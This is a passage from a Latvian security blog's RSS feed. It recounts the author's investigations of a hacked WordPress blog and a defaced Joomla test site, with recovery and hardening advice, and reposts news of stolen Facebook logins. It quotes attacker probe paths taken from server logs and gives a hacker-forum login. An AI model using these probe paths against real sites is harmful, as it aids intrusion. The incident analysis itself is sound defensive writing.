<blockquote><p>Pats nepārbaudīju, bet uz ātro atradu pamācību, <a href="http://www.cyberciti.biz/faq/apache-mod_dumpio-log-post-data/" target="_blank">kā iemācīt apacim logot</a> POST datus. Daudzi cepjās- logs augs nejēgā un to visu saglabāt nebūs iespējams, protams, bet ir jau alternatīvas- glabājam īsāku laiku, kopējam uz citurieni, utt. Viss ir atkarīgs vai no šādas info ir jēga- uzlaušanas gadījumā ir.</p></blockquote>
<p>2) atgriezts rezultāts, pēc tam tiek veikts mistisks GET- cik sapratu atkarībā no POST pieprasījuma rezultāta.</p>
<p><strong>Kas tad beigās tika izdarīts?</strong></p>
<ul>
<li>Veidojot mistiskos pieprasījumus <a href="http://dll.lv/wp-admin/admin-ajax.php">http://dll.lv/wp-admin/admin-ajax.php</a> failam brīnumdaris bija izdevies pārvietot lielu daļu rakstu uz trash.</li>
<li>Viņa posts &#8220;Hacked by n2n&#8221;, nebija izveidots no jauna, bet vienam rakstam no 2009, gada tika nomainīts saturs un virsraksts.</li>
<li>Tika izdzēsti visi tagi</li>
<li>Beigās izdevās nomainīt admin lietotāja epastu un tādā veidā iegūstot admina paroli.</li>
</ul>
<p>!!!AAA tiko ienāca prātā- vai tikai nebija ievietojis kādā no rakstiem javascript, kas nostrādāja, kad biju ielogojis admin sadaļā un tādā veidā nomainīja admin epasta adresi?</p>
<p>Par labu šai teorijai ir fakts, ka epastu nomainīja apmēram 2. minūtes pēc tam, kad mājās biju ielogojies administrēšanas sadaļā, kaut gan uzbrukums jau bija sācies 1h atpakaļ.</p>
<p>Varbūt sakritība. Bet pārbaudīt man to vairs neizdosies, jo visu iepriekšējo saturu jau esmu izdzēsis.</p>
<p><strong>Secinājumi:</strong><strong> </strong></p>
<p>Kārtējo reizi apstiprinās- uzstādod pēdējo &#8220;drošo&#8221; versiju, neviens nav pasargāts tik un tā.</p>
<p>Uzhakos ne tikai Windows, bet arī ar wordpress..</p>
<p>Backup- tas ir spēks <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><strong>Manas darbības pēc tam?</strong><strong> </strong></p>
<p>Viss kā pēc grāmatas-</p>
<p>Lādējam no wordpres.org wordpress un pluginus no jauna (jo pastāv iespēja, ka esošajā struktūrā ir izveidoti backdoor),</p>
<p>Izveidojam jaunu datubāzi</p>
<p>No rezerves kopijas paceļam pēdējo &#8220;drošo&#8221; DB versiju (izvēlējos nedēļu pirms uzbrukuma, jo man tā pat pa vidu bija tikai 1 posts.)</p>
<p>Šoreiz nevis vienkārši admin lietotājam uzstādam sarežģītu paroli, bet to izdzēšam.</p>
<p>Uzstādam jaunas paroles.</p>
<p>Meklējam rakstus par wordpress drošību (izrādās viņu ir pa pilno, piemēram<a href="http://sixrevisions.com/wordpress/12-essential-security-tips-and-hacks-for-wordpress/" target="_blank"> šāds</a>) un izpildām to norādījumus <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Uzstādam wordpress plugin (<a href="http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/">http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/</a>), kas palielina drošību.</p>
<p>Uzstādam plugin (<a href="http://wordpress.org/extend/plugins/threat-scan-plugin/">http://wordpress.org/extend/plugins/threat-scan-plugin/</a>) , kas pārbauda vai sistēmā nav kaut kas ieperinājies.</p>
<p>Esam nemitīgā stresā <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Hackeri uzbrūk vai gadās arī tā</title>
		<link>http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta</link>
		<comments>http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta#comments</comments>
		<pubDate>Wed, 05 May 2010 06:00:05 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[audits]]></category>
		<category><![CDATA[autentifikācija]]></category>
		<category><![CDATA[autorizācija]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[IT projektu problēms]]></category>
		<category><![CDATA[kodējam]]></category>
		<category><![CDATA[pieredze]]></category>
		<category><![CDATA[projekti]]></category>
		<category><![CDATA[web izstrāde]]></category>
		<category><![CDATA[zināšanas]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=964</guid>
		<description><![CDATA[Vakar izdomāju sakārtot savu WEB saimniecību un izdzēst uz servera aktualitāti zaudējušas lietas- dažādas testa lapas, izstrādes vides, utt.
Tā kā esmu jau aizmirsi, kas man tikai nestāv atveru FTP klientu, lai paskatītos direktoriju saturu.
Identificēju trīs izstrādes lapas, kuras jau ir nodotas un tātad tās var dzēst ārā. Tā kā miglaini atceros, kuras tās bija, tad [...]]]></description>
			<content:encoded><![CDATA[<p>Vakar izdomāju sakārtot savu WEB saimniecību un izdzēst uz servera aktualitāti zaudējušas lietas- dažādas testa lapas, izstrādes vides, utt.</p>
<p>Tā kā esmu jau aizmirsi, kas man tikai nestāv atveru FTP klientu, lai paskatītos direktoriju saturu.</p>
<p>Identificēju trīs izstrādes lapas, kuras jau ir nodotas un tātad tās var dzēst ārā. Tā kā miglaini atceros, kuras tās bija, tad ar lielu interesi ievadu pirmo:</p>
<p>http://dll.lv/test</p>
<p>Un mani sagaida brīnums <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><a href="http://dll.lv/wp-content/uploads/2010/05/hacked.png"><img class="aligncenter size-medium wp-image-966" title="hacked" src="http://dll.lv/wp-content/uploads/2010/05/hacked-300x123.png" alt="" width="300" height="123" /></a></p>
<p>Neliels pārsteigums&#8230;<span id="more-964"></span></p>
<p>Pārējās lapās izmaiņas nav konstatētas un tās tiek izdzēstas <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Gribu saprasta kas un kā.</p>
<p>Skatos failu struktūra vietā, bet ir parādījies jauns fails index.html (faila izveidošanas datums 17.03.2010- tāda vairāk kā mēnesi atpakaļ <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ), lai tas netraucētu gaisu pārsaucu par index.html1.</p>
<p>Skatāmies, kas notiek ar pašu joomla: <a href="http://dll.lv/wp-content/uploads/2010/05/joomla.png"><img class="aligncenter size-medium wp-image-968" title="joomla" src="http://dll.lv/wp-content/uploads/2010/05/joomla-300x30.png" alt="" width="300" height="30" /></a>Izskatās, ka arī datubāzi izdzēsis- atveru phpmyadmin un tiešām:</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/05/phpmyadmin.png"><img class="aligncenter size-medium wp-image-969" title="phpmyadmin" src="http://dll.lv/wp-content/uploads/2010/05/phpmyadmin-300x107.png" alt="" width="300" height="107" /></a></p>
<p>Paskatos joomla config failu:</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/05/konfig.png"><img class="aligncenter size-medium wp-image-967" title="konfig" src="http://dll.lv/wp-content/uploads/2010/05/konfig-300x125.png" alt="" width="300" height="125" /></a>Tas atbild uz jautājumu, kāpēc nav izdzēst viss pārējais- katrai testa sistēmai veidoju vienu  datubāzi un vienu lietotāju, kuram pieeja ir tikai konkrētai datubāzei. Izskatās, ka tas mani ir arī paglābis un brīnumdaris nenonesa pilnīgi visu.</p>
<p>Nav miera un gribu paskatīties dziļāk:</p>
<ul>
<li>Joomla logs izdzēsts ar visu datubāzi</li>
<li>Skatos Apache access log-  ieraksti ir pieejami tikai par pēdējo mēnesi, un līdz 17. maijam vairs nesniedzas. Izmainu konfigurāciju, lai turpmāk visus vecos log failus saarhivē un saglabā (iespējams noderēs, bet ceru ka nē <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ).</li>
<li>Skatos error_log- arī nekā.</li>
</ul>
<p>Hosters piedāvā webalizer un awstat:</p>
<ul>
<li>No webalizer kādu sakarīgu info izdabūt neizdodas.</li>
<li>Awstat-</li>
</ul>
<ol>
<li>no sākuma intresē, kā viņš ir mani uzgājis- pārbaudu meklētājos izmantotos keywords un keyphrases, par februāri un martu, bet nekā aizdomīga neatradu. Sagaidīju atrast kaut ko līdzīgu &#8220;joomla include &#8220;&#8221;", vai ko tamlīdzīgu.</li>
<li>Skatos, ko mēs varam sazīmēt saistībā ar IP adresēm- iegūstu IP adrešu sarakstu par martu un februāri, tomēr šis saraksts neuzrāda apmeklējuma dienu, līdz ar to nav īpaši noderīgs, ja vien netaisos pārbaudīt katru IP atsevišķi- ko es noteikti nedarīšu, jo tas ir pārāk laikietilpīgi (bet ja būtu noticis kas nozīmīgs, iespējams, arī būtu sācis pārbaudi).</li>
<li>Skatos apmeklētās lapas par februāri un martu- ir apmeklēta tikai http://dll.lv/test/, bet http://dll.lv/test/administrator nav apmeklēta. Dīvaini- jo biju izvirzījis hipotēzi, ka uzlaušana notika, jo administratora parole testa videi bija triviāla, bet ja administrēšanas lapa netika apmeklēta šis pieņēmums neapstiprinās.</li>
<li>Meklētās lapas, kuras netika atrastas vai atgrieza kļūdas paziņojumu- nekas interesants saistībā ar testa vidi, bet skatoties atklājās, ka kāds ir meklējis arī ievainojamības pašā blogā. Uz to norāda, piemēram šādi ieraksti:</li>
<p>///administrator/components/com_virtuemart/export.php<br />
/wp-content%20%C2%BB%3Ca%20href=<br />
/guestbook/public/paypal.fr/webscrcmd=_login-run/cgi-bin/login/Confirm.php<br />
/_vti_bin/owssvr.dll<br />
//path/authentication/phpbb3/phpbb3.functions.php<br />
utt.</p>
<li>Skatos ārējos refferers un starp tiem aizdomīga ir tikai http://www.sa-hacker.com/vb/showthread.php.</li>
</ol>
<p>Izskatās, ka esmu kaut ko uzķēris un droši veru lapu vaļā, bet ir aplauziens- viss ir arābu valodā un lai arī kaut ko redzētu ir nepieciešams reģistrēties. Reģistrācijai palīdz google tulkotājs, jo no tiem ķeburiem neko saprast nevar (ja kādam ir intrese par turieni paložņāt- user: zumzum, pass:zumzumzum, email:zumzum@spam.la). Izmeklējos par forumu, bet tomēr neko sakarīgu neatradu.</p>
<p>Kāds tad ir sausais atlikums?</p>
<p>Pēc analīzes secinu, ka ir izdzēsta datubāze, izveidots viens jauns fails, bet pārējā failu struktūra nav mainīta vai dzēsta.</p>
<p>Diemžēl nesanāca atklāt kādā veidā šis brīnums tika pastrādāts un līdz ar to neko prātīgu ieteikt neizdodas (iespējams bija novecojusi un bug -aina joomla vai tās komponente (tas gan mazticams, jo webalizer neuzrādīja apmeklētas kādas lapas, piemēram: dll.lv/test/component/crack.php?upload&#8230;) versija).</p>
<p>No šiem meistariem neesam pasargāti, bet, lai mazinātu to ietekmi:</p>
<ul>
<li>taisām backup</li>
<li>katrai sistēmai izdalām savu DB un atsevišķu lietotāju, kuram nav piekļuve citām datubāzēm.</li>
<li>saglabājam auditācijas pierakstus ilgāk..</li>
<li>vienmēr uzstādam pēdējos drošības ielāpus</li>
<li>ja ir iespēja uzstādīt papildus perimetra aizsardzību, piemēram, revers proxy</li>
<li>ja gadījies kāds incidents, tad to iespēju robežās izmeklējam un izdarām secinājumus, nevis ignorējam un ceram, ka tas neatkārtosies.</li>
</ul>
<p>PS.<br />
Tagad laikam ir īstais brīdis pateikt ko es domāju par šiem brīnumdariem-<strong> neko labu</strong>.</p>
<p>Manās acīs tie ir visādi mūdži, kuri nodarbojas tikai ar savu ģenitāliju staipīšanu.<br />
Cita lieta ir drošības speciālisti, kuri atklāj, konsultē un palīdz novērst (par naudu- protams) drošības ievainojamības vai ari hackeri, kuri iegūto informāciju izmanto ekonomisku labumu gūšanai, piemēram, izpirkuma maksas pieprasīšanai vai citas informācijas iegūšanai, ar kuru pēc tam operējot var uztaisīt skanošo- piemēram, kā ukraiņu <a title="http://dll.lv/interesanti-par-ukrainu-urki-oleksandr-dorozhko/" href="http://dll.lv/interesanti-par-ukrainu-urki-oleksandr-dorozhko/" target="_blank">hakers</a>.</p>
<p>Bet vienkārši atrast lapu ar konkrētu ievainojamību, to izdzēst, nemaz neiedziļinoties kam tā pieder un kam tā kalpo?? Tas, manuprāt, ir zem jebkāda goda, kaut palasot pievienotās rindiņas index failam- šim cilvēkam no Palestīnas tāda nemaz nav bijis kopš dzimšanas:</p>
<blockquote><p><span style="font-family: Times New Roman; color: #ff0000; font-size: large;">I aM: A FrEe PaLeStIn!aN&#8217;s HaCK3eR</span></p>
<p><span style="font-family: Times New Roman; color: #fdd017; font-size: large;">I DoN&#8217;t ApPeAr InTelLeGaNcE, BuT I AiM To DeStRoY InTeLlEgAnT</span></p>
<p><span style="font-family: Times New Roman; color: #ff0000; font-size: large;">DoN&#8217;t ChAlLeNg A PeRsOn WhO HaS N0N To LoSe</span></p>
<p><span style="font-family: Times New Roman; color: #fdd017; font-size: large;">PlAyInG WiTh Ch!LdReN DoSeN&#8217;t EnTeRtA!N Me<br />
</span></p>
<p>AdM!n DoN&#8217;t CrY&#8230;.. CrY!Ng Is N0T A MaN&#8217;s ShArM</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Nozagtas Facebook lietotāju paroles</title>
		<link>http://dll.lv/nozagtas-facebook-lietotaju-paroles</link>
		<comments>http://dll.lv/nozagtas-facebook-lietotaju-paroles#comments</comments>
		<pubDate>Tue, 27 Apr 2010 09:08:50 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[audits]]></category>
		<category><![CDATA[autentifikācija]]></category>
		<category><![CDATA[autorizācija]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[IT projektu problēms]]></category>
		<category><![CDATA[kodējam]]></category>
		<category><![CDATA[pieredze]]></category>
		<category><![CDATA[projekti]]></category>
		<category><![CDATA[web izstrāde]]></category>
		<category><![CDATA[zināšanas]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=949</guid>
		<description><![CDATA[Kā ziņo ABCnews.com Krievu hakerim ir izdevies nozagt Facebook lietotāju lietotājvārdus un paroles, kā arī viņš piedāvā tās iegādāties par 0,25$ vai 0,45$ (ja konkrētam lietotājam ir vismaz 10 draugu) gabalā.
Diemžēl (kas mai vairāk intresē) netiek ziņots kādā veidā viņam izdevies tās iegūt.
Raksts no ABCnews.com
Want a great deal on a Facebook account? A Russian hacker [...]]]></description>
			<content:encoded><![CDATA[<p>Kā ziņo <a title="http://abcnews.go.com/Technology/facebook-accounts-sold-russian-hacker-kirllos-user-logins/story?id=10461717" href="http://abcnews.go.com/Technology/facebook-accounts-sold-russian-hacker-kirllos-user-logins/story?id=10461717" target="_blank">ABCnews.com</a> Krievu hakerim ir izdevies nozagt Facebook lietotāju lietotājvārdus un paroles, kā arī viņš piedāvā tās iegādāties par 0,25$ vai 0,45$ (ja konkrētam lietotājam ir vismaz 10 draugu) gabalā.</p>
<p>Diemžēl (kas mai vairāk intresē) netiek ziņots kādā veidā viņam izdevies tās iegūt.<span id="more-949"></span></p>
<p>Raksts no ABCnews.com</p>
<blockquote><p>Want a great deal on a Facebook account? A Russian hacker who calls himself &#8220;kirllos&#8221; claims he can sell you 1,000 unsuspecting users&#8217; login credentials for just $25, or $45 if the accounts have more than 10 friends each.<br />
The hacker is believed to have stolen the IDs of 1.5 million Facebook users. If accurate, that means one out of every 300 Facebook users may have been victimized. Kirllos is selling the information on an underground hacker website, according to VeriSign&#8217;s iDefense Labs. The cybersecurity company estimates that kirllos has sold around 700,000 accounts so far, but VeriSign was unable to verify if any of the accounts are legitimate accounts belonging to real Facebook users.</p>
<p>Kirllos&#8217; prices are incredibly cheap compared to other scams for sale. E-mail usernames and passwords usually fetch between $1 to $20 each, according to Symantec&#8217;s latest Internet Security Threat Report. In contrast, Kirllos is claiming he will sell accounts for as little as 25 cents each.</p></blockquote>
<p>Raksts no DB.lv</p>
<blockquote><p>Hakeris no Krievijas vārdā Kirllos ir nozadzis 1,5 milj. pasaules lielākā sociālā tīkla Facebook lietotāju paroļu, ziņo ABC News.</p>
<p>Tas nozīmē, ka par hakera upuri kļūs katrs trīssimtais Facebook lietotājs. Kopumā šajā sociālajā tīklā ir reģistrējušies vairāk nekā 400 milj. lietotāju.<br />
Savukārt pēc Verisign&#8217;s idefense Labs informācijas, hakeris pārdod informāciju pagrīdes hakeru saitiem, un viņam jau esot izdevies pārdot aptuveni 700 tūkstošus paroļu.</p>
<p>Kirllos piedāvā paroles par zemāku cenu nekā citi. Šādi dati parasti maksā no viena līdz divdesmit ASV dolāriem, bet Kirllos tos piedāvājot par 25 centiem gabalā, taču paroles jāpērk vairumā.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://dll.lv/nozagtas-facebook-lietotaju-paroles/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
